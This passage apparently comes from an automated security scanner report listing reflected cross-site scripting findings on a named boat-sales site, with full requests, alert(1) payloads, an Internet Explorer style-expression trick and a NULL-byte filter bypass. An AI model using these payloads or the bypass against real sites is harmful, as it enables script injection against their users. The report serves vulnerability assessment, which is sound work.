This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /core/listing/cache/searchResults.jsp?man=regulator42756"style%3d"x%3aexpression(alert(1))"4d461dcf13719d17d&is=false&type=&luom=126&fromLength=24&toLength=32&fromYear=2004&toYear=&pricderange=Select+Price+Range&Ntt=&fromPrice=0&toPrice=&searchtype=homepage&cit=true&slim=quick&ybw=&sm=3&Ntk=boatsEN&currencyid=100 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/
Cache-Control: max-age=0
Origin: http://www.yachtworld.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; s_pers=%20s_nr%3D1296155951861%7C1298747951861%3B%20s_lv%3D1296155951863%7C1390763951863%3B%20s_lv_s%3DFirst%2520Visit%7C1296157751863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.2.10.1296155952; savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:36 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 97419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
<meta name="description" content="2004 regulator42756"style="x:expression(alert(1))"4d461dcf13719d17d Boats For Sale - YachtWorld.com">
...[SNIP]...

3.386. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [man parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the man request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48150"%3balert(1)//9fefc9ac6512fe6c was submitted in the man parameter. This input was echoed as 48150";alert(1)//9fefc9ac6512fe6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?man=regulator48150"%3balert(1)//9fefc9ac6512fe6c&is=false&type=&luom=126&fromLength=24&toLength=32&fromYear=2004&toYear=&pricderange=Select+Price+Range&Ntt=&fromPrice=0&toPrice=&searchtype=homepage&cit=true&slim=quick&ybw=&sm=3&Ntk=boatsEN&currencyid=100 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/
Cache-Control: max-age=0
Origin: http://www.yachtworld.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; s_pers=%20s_nr%3D1296155951861%7C1298747951861%3B%20s_lv%3D1296155951863%7C1390763951863%3B%20s_lv_s%3DFirst%2520Visit%7C1296157751863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.2.10.1296155952; savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:36 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 35316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
<!--
s.prop4="no search phrase entered"
s.prop5="regulator48150";alert(1)//9fefc9ac6512fe6c"
s.prop6="Used"
s.prop7="no search phrase entered"
s.prop8="24'-32'"
s.prop9=">
...[SNIP]...

3.387. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [man parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the man request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0064f43"%3balert(1)//6fa7de51e85 was submitted in the man parameter. This input was echoed as 64f43";alert(1)//6fa7de51e85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /core/listing/cache/searchResults.jsp?fromYear=2004&searchtype=homepage&Ntk=boatsEN&sm=3&toLength=32&cit=true&luom=126&currencyid=100&No=10&fromPrice=0&fromLength=24&man=regulator%0064f43"%3balert(1)//6fa7de51e85&slim=quick&is=false&pricderange=Select+Price+Range&resultsLayout=0 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 22:05:56 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_layout=0; path=/; expires=Wed, 15-Feb-2079 01:20:03 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
<!--
s.prop4="no search phrase entered"
s.prop5="regulator.64f43";alert(1)//6fa7de51e85"
s.prop6="Used"
s.prop7="no search phrase entered"
s.prop8="24'-32'"
s.prop9=">
...[SNIP]...

3.388. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae678"style%3d"x%3aexpression(alert(1))"5bd00433937e06452 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae678"style="x:expression(alert(1))"5bd00433937e06452 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /core/listing/cache/searchResults.jsp?man=regulator&is=false&type=&luom=126&fromLength=24&toLength=32&fromYear=2004&toYear=&pricderange=Select+Price+Range&Ntt=&fromPrice=0&toPrice=&searchtype=homepage&cit=true&slim=quick&ybw=&sm=3&Ntk=boatsEN&currencyid=100&ae678"style%3d"x%3aexpression(alert(1))"5bd00433937e06452=1 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/
Cache-Control: max-age=0
Origin: http://www.yachtworld.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; s_pers=%20s_nr%3D1296155951861%7C1298747951861%3B%20s_lv%3D1296155951863%7C1390763951863%3B%20s_lv_s%3DFirst%2520Visit%7C1296157751863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.2.10.1296155952; savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:41:51 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 94657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&ae678"style="x:expression(alert(1))"5bd00433937e06452&sm=3&luom=126&currencyid=100&cit=true&toLength=32&fromLength=24&fromPrice=0&man=regulator&slim=quick&N=3941&is=false&pricderange=Select+Price+Range" >
...[SNIP]...

3.389. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19e9d"style%3d"x%3aexpression(alert(1))"f5d3342dc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19e9d"style="x:expression(alert(1))"f5d3342dc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /core/listing/cache/searchResults.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&currencyid=100&cit=true&toLength=32&luom=126&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range&No=10&19e9d"style%3d"x%3aexpression(alert(1))"f5d3342dc2=1 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.12.10.1296155952; s_pers=%20s_nr%3D1296156045407%7C1298748045407%3B%20s_lv%3D1296156045410%7C1390764045410%3B%20s_lv_s%3DFirst%2520Visit%7C1296157845410%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/cache/searchResults.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromY%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:41:13 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 94057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
nofollow" href="/core/listing/cache/searchResults.jsp?fromYear=2004&searchtype=homepage&Ntk=boatsEN&sm=3&toLength=32&cit=true&luom=126&currencyid=100&fromLength=24&fromPrice=0&man=regulator&slim=quick&19e9d"style="x:expression(alert(1))"f5d3342dc2&N=3941&is=false&pricderange=Select+Price+Range" >
...[SNIP]...

3.390. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [pbsint parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the pbsint request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 725d1'%3balert(1)//e5c45981bb1 was submitted in the pbsint parameter. This input was echoed as 725d1';alert(1)//e5c45981bb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?cit=true&slim=quick&ybw=&sm=3&searchtype=homepage&Ntk=boatsEN&Ntt=&is=false&man=regulator&hmid=0&ftid=0&enid=0&fromLength=24&toLength=32&luom=126&fromYear=2004&toYear=&fromPrice=0&toPrice=&currencyid=100&city=&rid=&cint=100&pbsint=725d1'%3balert(1)//e5c45981bb1&boatsAddedSelected=-1 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/advancedSearch.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&luom=126&currencyid=100&cit=true&toLength=32&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; 